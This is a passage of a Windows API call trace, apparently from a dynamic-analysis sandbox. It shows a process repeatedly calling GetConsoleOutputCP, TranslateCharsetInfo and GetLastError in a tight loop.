GetConsoleOutputCP () returned 0x1b5 [0144.027] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.027] GetLastError () returned 0xcb [0144.027] GetConsoleOutputCP () returned 0x1b5 [0144.027] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.027] GetLastError () returned 0xcb [0144.027] GetConsoleOutputCP () returned 0x1b5 [0144.027] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.027] GetLastError () returned 0xcb [0144.027] GetConsoleOutputCP () returned 0x1b5 [0144.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.028] GetLastError () returned 0xcb [0144.028] GetConsoleOutputCP () returned 0x1b5 [0144.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.028] GetLastError () returned 0xcb [0144.028] GetConsoleOutputCP () returned 0x1b5 [0144.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.028] GetLastError () returned 0xcb [0144.028] GetConsoleOutputCP () returned 0x1b5 [0144.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.028] GetLastError () returned 0xcb [0144.028] GetConsoleOutputCP () returned 0x1b5 [0144.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.028] GetLastError () returned 0xcb [0144.028] GetConsoleOutputCP () returned 0x1b5 [0144.028] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.029] GetLastError () returned 0xcb [0144.029] GetConsoleOutputCP () returned 0x1b5 [0144.029] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.029] GetLastError () returned 0xcb [0144.029] GetConsoleOutputCP () returned 0x1b5 [0144.029] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.029] GetLastError () returned 0xcb [0144.029] GetConsoleOutputCP () returned 0x1b5 [0144.029] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.029] GetLastError () returned 0xcb [0144.029] GetConsoleOutputCP () returned 0x1b5 [0144.029] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.029] GetLastError () returned 0xcb [0144.029] GetConsoleOutputCP () returned 0x1b5 [0144.029] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.029] GetLastError () returned 0xcb [0144.029] GetConsoleOutputCP () returned 0x1b5 [0144.030] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.030] GetLastError () returned 0xcb [0144.030] GetConsoleOutputCP () returned 0x1b5 [0144.030] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.030] GetLastError () returned 0xcb [0144.030] GetConsoleOutputCP () returned 0x1b5 [0144.030] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.030] GetLastError () returned 0xcb [0144.030] GetConsoleOutputCP () returned 0x1b5 [0144.030] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.030] GetLastError () returned 0xcb [0144.030] GetConsoleOutputCP () returned 0x1b5 [0144.030] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.030] GetLastError () returned 0xcb [0144.030] GetConsoleOutputCP () returned 0x1b5 [0144.032] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.032] GetLastError () returned 0xcb [0144.032] GetConsoleOutputCP () returned 0x1b5 [0144.032] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.032] GetLastError () returned 0xcb [0144.032] GetConsoleOutputCP () returned 0x1b5 [0144.032] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.033] GetLastError () returned 0xcb [0144.033] GetConsoleOutputCP () returned 0x1b5 [0144.033] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.033] GetLastError () returned 0xcb [0144.033] GetConsoleOutputCP () returned 0x1b5 [0144.033] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.033] GetLastError () returned 0xcb [0144.033] GetConsoleOutputCP () returned 0x1b5 [0144.033] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.033] GetLastError () returned 0xcb [0144.033] GetConsoleOutputCP () returned 0x1b5 [0144.033] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.033] GetLastError () returned 0xcb [0144.033] GetConsoleOutputCP () returned 0x1b5 [0144.033] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.033] GetLastError () returned 0xcb [0144.033] GetConsoleOutputCP () returned 0x1b5 [0144.034] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.034] GetLastError () returned 0xcb [0144.034] GetConsoleOutputCP () returned 0x1b5 [0144.034] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.034] GetLastError () returned 0xcb [0144.034] GetConsoleOutputCP () returned 0x1b5 [0144.034] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.034] GetLastError () returned 0xcb [0144.034] GetConsoleOutputCP () returned 0x1b5 [0144.034] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.034] GetLastError () returned 0xcb [0144.034] GetConsoleOutputCP () returned 0x1b5 [0144.034] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.034] GetLastError () returned 0xcb [0144.034] GetConsoleOutputCP () returned 0x1b5 [0144.034] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.034] GetLastError () returned 0xcb [0144.034] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.035] GetLastError () returned 0xcb [0144.035] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.035] GetLastError () returned 0xcb [0144.035] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.035] GetLastError () returned 0xcb [0144.035] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.035] GetLastError () returned 0xcb [0144.035] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.035] GetLastError () returned 0xcb [0144.035] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.035] GetLastError () returned 0xcb [0144.035] GetConsoleOutputCP () returned 0x1b5 [0144.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.036] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.036] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.036] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.036] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.036] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.036] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.036] GetLastError () returned 0xcb [0144.036] GetConsoleOutputCP () returned 0x1b5 [0144.037] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.037] GetLastError () returned 0xcb [0144.037] GetConsoleOutputCP () returned 0x1b5 [0144.037] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.037] GetLastError () returned 0xcb [0144.037] GetConsoleOutputCP () returned 0x1b5 [0144.037] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.037] GetLastError () returned 0xcb [0144.037] GetConsoleOutputCP () returned 0x1b5 [0144.037] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.037] GetLastError () returned 0xcb [0144.037] GetConsoleOutputCP () returned 0x1b5 [0144.037] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.037] GetLastError () returned 0xcb [0144.037] GetConsoleOutputCP () returned 0x1b5 [0144.037] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.037] GetLastError () returned 0xcb [0144.038] GetConsoleOutputCP () returned 0x1b5 [0144.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.038] GetLastError () returned 0xcb [0144.038] GetConsoleOutputCP () returned 0x1b5 [0144.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.038] GetLastError () returned 0xcb [0144.038] GetConsoleOutputCP () returned 0x1b5 [0144.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.038] GetLastError () returned 0xcb [0144.038] GetConsoleOutputCP () returned 0x1b5 [0144.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.038] GetLastError () returned 0xcb [0144.038] GetConsoleOutputCP () returned 0x1b5 [0144.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.038] GetLastError () returned 0xcb [0144.038] GetConsoleOutputCP () returned 0x1b5 [0144.039] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.039] GetLastError () returned 0xcb [0144.039] GetConsoleOutputCP () returned 0x1b5 [0144.039] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.039] GetLastError () returned 0xcb [0144.039] GetConsoleOutputCP () returned 0x1b5 [0144.039] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.039] GetLastError () returned 0xcb [0144.039] GetConsoleOutputCP () returned 0x1b5 [0144.039] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.039] GetLastError () returned 0xcb [0144.039] GetConsoleOutputCP () returned 0x1b5 [0144.039] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.039] GetLastError () returned 0xcb [0144.039] GetConsoleOutputCP () returned 0x1b5 [0144.039] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.039] GetLastError () returned 0xcb [0144.039] GetConsoleOutputCP () returned 0x1b5 [0144.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.040] GetLastError () returned 0xcb [0144.040] GetConsoleOutputCP () returned 0x1b5 [0144.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.040] GetLastError () returned 0xcb [0144.040] GetConsoleOutputCP () returned 0x1b5 [0144.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.040] GetLastError () returned 0xcb [0144.040] GetConsoleOutputCP () returned 0x1b5 [0144.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.040] GetLastError () returned 0xcb [0144.040] GetConsoleOutputCP () returned 0x1b5 [0144.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.040] GetLastError () returned 0xcb [0144.040] GetConsoleOutputCP () returned 0x1b5 [0144.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.040] GetLastError () returned 0xcb [0144.040] GetConsoleOutputCP () returned 0x1b5 [0144.041] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.041] GetLastError () returned 0xcb [0144.041] GetConsoleOutputCP () returned 0x1b5 [0144.041] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.041] GetLastError () returned 0xcb [0144.041] GetConsoleOutputCP () returned 0x1b5 [0144.041] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.041] GetLastError () returned 0xcb [0144.041] GetConsoleOutputCP () returned 0x1b5 [0144.041] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.041] GetLastError () returned 0xcb [0144.041] GetConsoleOutputCP () returned 0x1b5 [0144.041] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.041] GetLastError () returned 0xcb [0144.041] GetConsoleOutputCP () returned 0x1b5 [0144.041] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.041] GetLastError () returned 0xcb [0144.041] GetConsoleOutputCP () returned 0x1b5 [0144.042] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.042] GetLastError () returned 0xcb [0144.042] GetConsoleOutputCP () returned 0x1b5 [0144.042] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.042] GetLastError () returned 0xcb [0144.042] GetConsoleOutputCP () returned 0x1b5 [0144.042] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.042] GetLastError () returned 0xcb [0144.042] GetConsoleOutputCP () returned 0x1b5 [0144.042] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.042] GetLastError () returned 0xcb [0144.042] GetConsoleOutputCP () returned 0x1b5 [0144.042] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.042] GetLastError () returned 0xcb [0144.042] GetConsoleOutputCP () returned 0x1b5 [0144.042] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.042] GetLastError () returned 0xcb [0144.043] GetConsoleOutputCP () returned 0x1b5 [0144.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.043] GetLastError () returned 0xcb [0144.043] GetConsoleOutputCP () returned 0x1b5 [0144.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.043] GetLastError () returned 0xcb [0144.043] GetConsoleOutputCP () returned 0x1b5 [0144.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.043] GetLastError () returned 0xcb [0144.043] GetConsoleOutputCP () returned 0x1b5 [0144.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.043] GetLastError () returned 0xcb [0144.043] GetConsoleOutputCP () returned 0x1b5 [0144.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.043] GetLastError () returned 0xcb [0144.043] GetConsoleOutputCP () returned 0x1b5 [0144.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.044] GetLastError () returned 0xcb [0144.044] GetConsoleOutputCP () returned 0x1b5 [0144.044] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.044] GetLastError () returned 0xcb [0144.044] GetConsoleOutputCP () returned 0x1b5 [0144.044] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.044] GetLastError () returned 0xcb [0144.044] GetConsoleOutputCP () returned 0x1b5 [0144.044] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.044] GetLastError () returned 0xcb [0144.044] GetConsoleOutputCP () returned 0x1b5 [0144.044] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.044] GetLastError () returned 0xcb [0144.044] GetConsoleOutputCP () returned 0x1b5 [0144.044] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.044] GetLastError () returned 0xcb [0144.044] GetConsoleOutputCP () returned 0x1b5 [0144.045] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.045] GetLastError () returned 0xcb [0144.045] GetConsoleOutputCP () returned 0x1b5 [0144.045] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.045] GetLastError () returned 0xcb [0144.045] GetConsoleOutputCP () returned 0x1b5 [0144.045] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.045] GetLastError () returned 0xcb [0144.045] GetConsoleOutputCP () returned 0x1b5 [0144.045] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.045] GetLastError () returned 0xcb [0144.045] GetConsoleOutputCP () returned 0x1b5 [0144.045] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.045] GetLastError () returned 0xcb [0144.045] GetConsoleOutputCP () returned 0x1b5 [0144.045] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.045] GetLastError () returned 0xcb [0144.045] GetConsoleOutputCP () returned 0x1b5 [0144.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.046] GetLastError () returned 0xcb [0144.046] GetConsoleOutputCP () returned 0x1b5 [0144.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.046] GetLastError () returned 0xcb [0144.046] GetConsoleOutputCP () returned 0x1b5 [0144.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.046] GetLastError () returned 0xcb [0144.046] GetConsoleOutputCP () returned 0x1b5 [0144.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.046] GetLastError () returned 0xcb [0144.046] GetConsoleOutputCP () returned 0x1b5 [0144.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.046] GetLastError () returned 0xcb [0144.046] GetConsoleOutputCP () returned 0x1b5 [0144.046] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.046] GetLastError () returned 0xcb [0144.046] GetConsoleOutputCP () returned 0x1b5 [0144.047] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.047] GetLastError () returned 0xcb [0144.047] GetConsoleOutputCP () returned 0x1b5 [0144.047] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.047] GetLastError () returned 0xcb [0144.047] GetConsoleOutputCP () returned 0x1b5 [0144.047] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.047] GetLastError () returned 0xcb [0144.047] GetConsoleOutputCP () returned 0x1b5 [0144.047] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.047] GetLastError () returned 0xcb [0144.047] GetConsoleOutputCP () returned 0x1b5 [0144.047] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.047] GetLastError () returned 0xcb [0144.047] GetConsoleOutputCP () returned 0x1b5 [0144.047] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.047] GetLastError () returned 0xcb [0144.047] GetConsoleOutputCP () returned 0x1b5 [0144.048] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.048] GetLastError () returned 0xcb [0144.048] GetConsoleOutputCP () returned 0x1b5 [0144.048] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 